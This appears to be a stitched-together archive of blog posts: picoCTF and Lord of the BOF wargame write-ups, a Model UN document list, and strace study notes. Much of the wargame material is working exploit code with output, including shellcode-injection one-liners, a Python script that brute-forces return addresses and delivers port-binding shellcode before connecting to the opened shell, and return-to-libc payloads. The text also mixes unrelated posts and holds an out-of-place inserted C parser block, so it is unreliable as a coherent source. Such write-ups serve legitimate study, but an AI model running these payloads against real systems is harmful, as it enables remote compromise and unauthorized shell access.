pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                                                                    €莽咽œ昶苔ƒ嚆

 

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb) 

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734


0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a

(gdb) q


pico19855@shell:~$ cd /home/no_overflow

pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                       €莽擎|昶苔ƒ嚆

ls

Makefile  core flag.txt  no_overflow  no_overflow.c

cat flag.txt

what_is_your_sign


Other posts in the 'CTF > picoCTF' category

picoCTF 2018 writeup  (1) 2019.02.05
picoCTF 2014  (6) 2014.11.19
picoCTF 2013  (0) 2014.06.27
  1. EverTokki 2014.11.25 05:34

    Shellcode from: http://shell-storm.org/shellcode/files/shellcode-827.php

  2. dkdkdkdkdkdkdbdbddkdbdb 2015.11.01 09:34

    If I want to study hacking, what should I start with first?

    • EverTokki 2015.11.01 13:56

      I think you at least need to know how to read C.
      http://itguru.tistory.com/187 I started with the "씹어먹는 C언어" course there. And if you look around HackerSchool, there should be plenty of other courses too.

  3. dkdkdkddkdkdkdkkdkdkd 2015.11.08 18:49

    I've also been told to learn programming, like algorithms, first. What do you think?

    • 에버토끼 2015.11.08 19:32

      To answer what I think: honestly, it is up to the learner. If that is what interests you, you can start with algorithms.

  4. dkdkdkkdkdkdkdk 2015.11.18 11:02

    Thank you. Haha

These are the country report, position paper (policy statement) and resolutions I submitted for the Model UN held at DAA this year.

I took part as the UK in ECOSOC; the topics were "Measures to ensure gender equity in the MENA region" and "The question of food and water security in the MENA region". Since it was a small school event, I didn't do much research or prepare properly, so there is no individual resolution. lol Since this isn't solely my own work, please use it for reference only.



ECOSOC-GenderEquality-UK_PositionPaper.docx


Food and Water Scarcity-Resolutions.docx


Gender equity measures-Resolution Qatar, Saudi Arabia, Egypt.doc


GenderEquality-Resolutions.docx


UK_CountryReport.docx


Water and Food UK Saudi Arabia Turkey Singapore.docx





Other posts in the 'ARCHIVE > School' category

AUDMUN2015 review [LIVE]  (0) 2015.10.30
[Google internship] A week at Google Dubai  (9) 2015.05.06
DAAMUN 1- United Kingdom  (0) 2014.11.01
[English] To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[Science] The effect of salt on ice lab report  (0) 2013.12.02
JoMUN 11- Mali  (0) 2013.10.08
I had to use my head a bit this time, but I'd always really wanted to try socket programming, so I think I cleared this one having fun.

At first I thought a shell should pop but it didn't, so I searched the internet a bit: shellcode that, instead of handing the shell... um, how to put it... directly to the program that connected, binds another port, leaves it listening, and only gives you the shell once you connect to that port is called port-binding shellcode. There was a similar question on Stack Overflow, which is how I learned that I had to use port-binding shellcode. I found the shellcode at http://shell-storm.org/shellcode/files/shellcode-217.php.



[xavius@localhost xavius]$ cat death_knight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark knight
        - remote BOF
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>

main()
{
        char buffer[40];

        int server_fd, client_fd;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;
        int sin_size;

        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(6666);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);

        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
                perror("bind");
                exit(1);
        }

        if(listen(server_fd, 10) == -1){
                perror("listen");
                exit(1);
        }

        while(1) {
                sin_size = sizeof(struct sockaddr_in);
                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
                        perror("accept");
                        continue;
                }

                if (!fork()){
                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
                        send(client_fd, "You : ", 6, 0);
                        recv(client_fd, buffer, 256, 0);
                        close(client_fd);
                        break;
                }

                close(client_fd);
                while(waitpid(-1,NULL,WNOHANG) > 0);
        }
        close(server_fd);
}

I'm hopeless with complicated code, and this looked complicated the moment I saw it haha.... I need to study programming harder.

Since my goal was just to clear the level, I skipped the perror parts, i.e. the lines that print error messages. The source above them is just the socket setup.

So the part to look at is this:

                if (!fork()){
                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
                        send(client_fd, "You : ", 6, 0);
                        recv(client_fd, buffer, 256, 0);
                        close(client_fd);
                        break;
                }

Here you can see that it sends 52 bytes and 6 bytes, then receives 256 bytes.

The buffer is 40 bytes, so this is where the buffer overflow happens.

The code I first brute-forced with was this:

#!/usr/bin/python
# Python 2

from socket import *
import struct, sys

# 96 bytes of port-binding shellcode (listens on port 31337), from shell-storm 217
shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)   # 32-bit little-endian

# payload = nop 44 | ret_addr 4 | nop 110 | shellcode 96  (254 bytes, fits the 256-byte recv)

print("Connecting..")

for address in range (0xbffff000, 0xbfffffff):
        # build a fresh payload for each candidate return address
        payload = '\x90'*44 + p(address) + '\x90'*110 + shellcode

        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.10.129",6666))
        print(s.recv(52))
        print(s.recv(6))
        s.send(payload)
        s.close()


p = lambda x : struct.pack("<I", x) is the part that converts the address to little-endian.

I just built it like a payload: 44 NOPs, the return address, 110 NOPs, and then the shellcode.

As for the for address in range loop below: looking into it now, it seems there is a way to find the address using the dumpcode included in the challenge's code, but at the time I couldn't see any way to get the address and felt stuck, so I just brute-forced it..

Then it sent the payload.

But when I ran it, all I got was

Death Knight : Not even death can save you from me!

You : 

over and over, and no shell. Once I realized I had to connect to the bound port, I changed the source.

Administratorui-MacBook-Pro-2:~ EverTokki$ vi exploit_lob.py 


#!/usr/bin/python
# Python 2

from socket import *
import struct, sys
import os

# 96 bytes of port-binding shellcode (listens on port 31337), from shell-storm 217
shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)   # 32-bit little-endian

# payload = nop 44 | ret_addr 4 | nop 110 | shellcode 96  (254 bytes, fits the 256-byte recv)

print("Connecting..")

for address in range (0xbffff000, 0xbfffffff):
        # build a fresh payload for each candidate return address
        payload = '\x90'*44 + p(address) + '\x90'*110 + shellcode

        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.10.129",6666))
        print(s.recv(52))
        print(s.recv(6))
        s.send(payload)
        s.close()

        # the shellcode runs in the forked child and binds its own port:
        # connect to that port to get the shell
        os.system("telnet 192.168.10.129 31337")


And the neat thing was that a shell popped up right away. Also that plain input didn't go through: I had to type it as command; for it to get through.

Administratorui-MacBook-Pro-2:~ EverTokki$ python exploit_lob.py 

Connecting..

Death Knight : Not even death can save you from me!


You : 

Trying 192.168.10.129...

Connected to 192.168.10.129.

Escape character is '^]'.

ls

: command not found

ls;

bin

boot

dev

etc

home

lib

lost+found

mnt

opt

proc

root

sbin

tmp

usr

var

my-pass;

euid = 520


When I typed exit, the brute-forcing just kept running haha

Then when I tried again afterwards, it didn't work???

??

??? It really doesn't work. Did I break something?

Anyway, solving it was really fun..


login: death_knight
Password:
[death_knight@localhost death_knight]$ ls
dropped_item.txt
[death_knight@localhost death_knight]$ cat dropped_item.txt

 You're so great! This is a token to the next gate.

                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

[death_knight@localhost death_knight]$

And so the RedHat 6.2 journey ends.

I have an exam tomorrow and it's 1 AM after doing this. I'm in trouble.

Other posts in the 'STUDY > Lord of the BOF' category

Lord of the BOF  (0) 2019.02.07
xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
Everyone, hold on, this level is weird.

Passing the input to stdin with cat is right, and after 팝렛 hyung hinted that I should use strace and I got a feel for it, I attacked, but I didn't even get a segmentation fault. Hmm, I definitely put in 48 bytes. And the other weird thing: I wondered whether the shellcode was the problem, so I tried the shellcode from a published solution (I borrowed Sanguine hyung's shellcode for a while). Look at the log.


[nightmare@localhost nightmare]$ bash2

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@




















ㅁㄴㅇ

/bin/sh: ㅁㄴㅇ: command not found

ㄹmy-pass

/bin/sh: ㄹmy-pass: command not found

my-pass

euid = 519

throw me away

q

/bin/sh: q: command not found

exit

exit


As I kept pressing enter it turned out like that..? And when I tried again a little later


[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

??



..and while writing this post, I realized..

the difference between "' ; cat) and "';cat)..

Ugh....

No wait, I don't think that's actually the problem. It's some kind of format problem, but I'm not sure it's the spacing..?

But it doesn't work with other shellcode. Why is that? Could it be that 2f doesn't get through when passed over a pipe?

Anyway, glad it's solved! It looked really hopeless at first, but it's solved.




I'll be referring to http://www.linuxintro.org/wiki/Strace !


At the moment of writing this I have no idea how to use strace at all. All I know is that you can run it as strace <file>.

So let's try it together. Let's write a hello world program and analyze it.

[nightmare@localhost nightmare]$ cat hello.c

#include <stdio.h>

int main()
{
        printf("Hello, World!\n");
        return 0;
}


Compile it and first dump the output with strace ./filename.


[nightmare@localhost nightmare]$ strace ./hello

execve("./hello", ["./hello"], [/* 22 vars */]) = 0

brk(0)                                  = 0x8049548

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY)      = 3

fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

close(3)                                = 0

open("/lib/libc.so.6", O_RDONLY)        = 3

fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

mprotect(0x40105000, 30812, PROT_NONE)  = 0

old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

close(3)                                = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

munmap(0x40015000, 12210)               = 0

personality(PER_LINUX)                  = 0

getpid()                                = 1120

fstat64(0x1, 0xbffff364)                = -1 ENOSYS (Function not implemented)

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

write(1, "Hello, World!\n", 14Hello, World!

)         = 14

munmap(0x40015000, 4096)                = 0

_exit(0)                                = ?


"To analyze strace's output you must know that the first keyword in a line of output from strace is always a syscall like open or read. Then, in parantheses, the arguments follow, then the result. "

So the first keyword of strace's output is the system call, and the arguments passed are inside the parentheses. And the result follows after that. I guess the part after = is the result?

lol it says that's right.


"Every line follows the syntax

syscall(arguments) = return value"

It also kindly says that if you don't know what a system call does, look it up with man 2 <systemcall>.
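To make the syscall(arguments) = return value shape concrete, here is an added example of my own (not code from the linuxintro wiki or from this blog): a small C parser that splits each strace line into the syscall name, the raw argument text and the return value, picks up the errno symbol on failed calls such as the ENOENT on /etc/ld.so.preload above, and counts the failed calls in a trace. The sample lines are copied from the hello trace above; the names parse_strace_line, count_failed_calls and SAMPLE are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* One parsed strace line:  syscall(arguments) = return value [ERRNO (message)] */
struct syscall_line {
        char name[32];    /* syscall name, e.g. "open" */
        char args[256];   /* raw argument text between the outer parentheses */
        long ret;         /* numeric return value; 0 when has_ret is 0 */
        int  has_ret;     /* 0 for lines that end in "= ?" (the process exited) */
        char err[16];     /* errno symbol such as ENOENT; "" when the call succeeded */
};

/* Last occurrence of needle in hay, or NULL. */
static const char *last_occurrence(const char *hay, const char *needle)
{
        const char *found = NULL, *p = hay;
        while ((p = strstr(p, needle)) != NULL) { found = p; p++; }
        return found;
}

/* Parse one line. Returns 0 on success, -1 if the line does not follow the syntax. */
int parse_strace_line(const char *line, struct syscall_line *out)
{
        memset(out, 0, sizeof *out);
        const char *lp = strchr(line, '(');
        const char *eq = last_occurrence(line, " = ");   /* the result follows the last " = " */
        if (!lp || !eq || eq < lp)
                return -1;
        size_t nlen = (size_t)(lp - line);
        if (nlen == 0 || nlen >= sizeof out->name)
                return -1;
        memcpy(out->name, line, nlen);
        /* the argument text ends at the last ')' before " = "; scanning backwards
           keeps nested calls such as makedev(136, 0) from confusing the split */
        const char *rp = eq;
        while (rp > lp && *rp != ')')
                rp--;
        if (rp == lp)
                return -1;
        size_t alen = (size_t)(rp - lp - 1);
        if (alen >= sizeof out->args)
                alen = sizeof out->args - 1;
        memcpy(out->args, lp + 1, alen);
        const char *rv = eq + 3;
        if (*rv == '?')                    /* "= ?": no return value was observed */
                return 0;
        char *end;
        out->ret = strtol(rv, &end, 0);    /* base 0 accepts both 14 and 0x8049548 */
        if (end == rv)
                return -1;
        out->has_ret = 1;
        while (*end == ' ')
                end++;
        size_t elen = 0;                   /* optional errno symbol: upper-case letters/digits */
        while (isupper((unsigned char)end[elen]) || isdigit((unsigned char)end[elen]))
                elen++;
        if (elen > 0 && elen < sizeof out->err)
                memcpy(out->err, end, elen);
        return 0;
}

/* Number of calls in the trace that failed (negative return with an errno symbol). */
int count_failed_calls(const char *const *lines, size_t n)
{
        int failed = 0;
        for (size_t i = 0; i < n; i++) {
                struct syscall_line sl;
                if (parse_strace_line(lines[i], &sl) == 0 && sl.has_ret && sl.ret < 0 && sl.err[0])
                        failed++;
        }
        return failed;
}

/* Constructed sample: lines copied from the strace ./hello output above. */
static const char *const SAMPLE[] = {
        "execve(\"./hello\", [\"./hello\"], [/* 22 vars */]) = 0",
        "brk(0)                                  = 0x8049548",
        "open(\"/etc/ld.so.preload\", O_RDONLY)    = -1 ENOENT (No such file or directory)",
        "open(\"/etc/ld.so.cache\", O_RDONLY)      = 3",
        "fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0",
        "fstat64(0x1, 0xbffff364)                = -1 ENOSYS (Function not implemented)",
        "_exit(0)                                = ?",
};
static const size_t SAMPLE_N = sizeof SAMPLE / sizeof SAMPLE[0];

int main(void)
{
        for (size_t i = 0; i < SAMPLE_N; i++) {
                struct syscall_line sl;
                if (parse_strace_line(SAMPLE[i], &sl) != 0) {
                        printf("unparsed: %s\n", SAMPLE[i]);
                        continue;
                }
                printf("%-8s ret=%ld%s %s\n", sl.name, sl.ret, sl.has_ret ? "" : " (?)", sl.err);
        }
        printf("failed calls: %d\n", count_failed_calls(SAMPLE, SAMPLE_N));
        return 0;
}
```

Build it with gcc -std=c99 -Wall (file name of your choosing) and run it. Triaging a trace for failed calls this way is how you spot a binary probing for files it should not find (a preload library, a config file outside its own directory) before reading the whole trace line by line; the two failures in the sample, ld.so.preload and fstat64, are both benign here, which is exactly the kind of thing you want to be able to say quickly.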

Uh.. but now that I think about it, that's all there is?

Whoa?

Done.


But old_mmap, mmap and munmap all seem like the same thing, and I don't quite get what they do. And I don't know why I avoided strace.. all this time. You really do have to just try things. I'd been too scared to touch it lolololol. Ugh..


++) mmap seems to allocate memory for some device to use, so does it create the space used by each function, i.e. functions like open, read and write? Looking at the strace above, there's one before each function is run..


Is vacation hell or what? Why am I being given these trials? Why am I not doing my academy homework?


[succubus@localhost succubus]$ ls

nightmare  nightmare.c

[succubus@localhost succubus]$ cat nightmare.c

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }// the ret after the buffer has to be strcpy; judging from the hint in the comment above, that means using the PLT address

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}

[succubus@localhost succubus]$ cp nightmare fightmare

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p strcpy

$1 = {char *(char *, char *)} 0x400767b0 <strcpy>

(gdb) disas main

Dump of assembler code for function main:

0x80486b4 <main>:       push   %ebp

0x80486b5 <main+1>:     mov    %esp,%ebp

0x80486b7 <main+3>:     sub    $0x2c,%esp

0x80486ba <main+6>:     cmpl   $0x1,0x8(%ebp)

0x80486be <main+10>:    jg     0x80486d7 <main+35>

0x80486c0 <main+12>:    push   $0x80487db

0x80486c5 <main+17>:    call   0x80483e0 <printf>

0x80486ca <main+22>:    add    $0x4,%esp

0x80486cd <main+25>:    push   $0x0

0x80486cf <main+27>:    call   0x80483f0 <exit>

0x80486d4 <main+32>:    add    $0x4,%esp

0x80486d7 <main+35>:    movl   $0x8048410,0xffffffd4(%ebp)

0x80486de <main+42>:    push   $0x4

0x80486e0 <main+44>:    lea    0xffffffd4(%ebp),%eax

0x80486e3 <main+47>:    push   %eax

0x80486e4 <main+48>:    mov    0xc(%ebp),%eax

0x80486e7 <main+51>:    add    $0x4,%eax

0x80486ea <main+54>:    mov    (%eax),%edx

0x80486ec <main+56>:    add    $0x2c,%edx

0x80486ef <main+59>:    push   %edx

0x80486f0 <main+60>:    call   0x80483c0 <memcmp>

0x80486f5 <main+65>:    add    $0xc,%esp

0x80486f8 <main+68>:    mov    %eax,%eax

0x80486fa <main+70>:    test   %eax,%eax

0x80486fc <main+72>:    je     0x8048715 <main+97>

0x80486fe <main+74>:    push   $0x8048800

0x8048703 <main+79>:    call   0x80483e0 <printf>

0x8048708 <main+84>:    add    $0x4,%esp

0x804870b <main+87>:    push   $0x0

0x804870d <main+89>:    call   0x80483f0 <exit>

0x8048712 <main+94>:    add    $0x4,%esp

0x8048715 <main+97>:    mov    0xc(%ebp),%eax

0x8048718 <main+100>:   add    $0x4,%eax

0x804871b <main+103>:   mov    (%eax),%edx

0x804871d <main+105>:   push   %edx

0x804871e <main+106>:   lea    0xffffffd8(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x8048721 <main+109>:   push   %eax

0x8048722 <main+110>:   call   0x8048410 <strcpy> // no @plt suffix is shown, but it feels like this is it

0x8048727 <main+115>:   add    $0x8,%esp

0x804872a <main+118>:   lea    0xffffffd8(%ebp),%eax

0x804872d <main+121>:   push   %eax

0x804872e <main+122>:   push   $0x8048825

0x8048733 <main+127>:   call   0x80483e0 <printf>

0x8048738 <main+132>:   add    $0x8,%esp

0x804873b <main+135>:   push   $0x4

0x804873d <main+137>:   push   $0x41

0x804873f <main+139>:   lea    0xffffffd8(%ebp),%eax

0x8048742 <main+142>:   lea    0x30(%eax),%edx

0x8048745 <main+145>:   push   %edx

0x8048746 <main+146>:   call   0x8048400 <memset>

0x804874b <main+151>:   add    $0xc,%esp

0x804874e <main+154>:   leave

0x804874f <main+155>:   ret

End of assembler dump.

(gdb) q

The program is running.  Exit anyway? (y or n) y

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`

„// Tried it and it works. Nice lol

/* I thought about this for a while: the program above fills the spot where the ret address goes with 'A' after strcpy runs. But why strcpy of all things? Presumably because they want you to use it. Since the argument isn't length-limited either, I concluded that in the end you use strcpy to put an address into the spot where ret goes. So at first I tried putting the system address and the /bin/sh address after strcpy's two arguments, but that didn't work. So I just put them in front. */

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y


/* I did way too much flailing in the middle, so instead of hiding it I just deleted it all.... */


[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`

bash2: export: command not found

[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`

[succubus@localhost succubus]$ ls

core  fightmare  nightmare  nightmare.c

[succubus@localhost succubus]$ vi foo.c

[succubus@localhost succubus]$ gcc foo.c -o foo

foo.c: In function `main':

foo.c:5: warning: assignment makes pointer from integer without a cast

[succubus@localhost succubus]$ ./foo BINSH

0xbffffc7c

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf"  '`

AAAAúú ¿úú ¿@BBBB|ü ¿

Segmentation fault (core dumped)


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp-80

0xbffffa74:     0xbffffb04      0xbffffab8      0x0804874b      0xbffffac0

0xbffffa84:     0x00000041      0x00000004      0x08048410      0x90909090

0xbffffa94:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab4:     0x90909090      0x4000ae60      0x90909090      0x41414141

0xbffffac4:     0xbffffad0      0xbffffadc      0x40058ae0      0x08048441

0xbffffad4:     0x080486b4      0x00000002      0x08048441      0x080486b4

0xbffffae4:     0x00000002      0xbffffb04      0x08048350      0x0804877c

0xbffffaf4:     0x4000ae60      0xbffffafc      0x40013e90      0x00000002

0xbffffb04:     0xbffffc02      0xbffffc0e      0x00000000      0xbffffc57

(gdb) x/wx 0xbffffa90

0xbffffa90:     0x90909090

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿˜ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿˜ú ¿'.


Program terminated with signal 11, Segmentation fault.

#0  0x41410004 in ?? () // hardly changed

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿¬ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x90909090 in ?? ()

(gdb) x/40wx 0xbffffaac

0xbffffaac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffabc:     0x90909090      0x90909090      0x90909090      0x4000ae60

0xbffffacc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffadc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaec:     0x0800ae60      0x080486b4      0x00000002      0xbffffb14

0xbffffafc:     0x08048350      0x0804877c      0x4000ae60      0xbffffb0c

0xbffffb0c:     0x40013e90      0x00000002      0xbffffc0e      0xbffffc1a

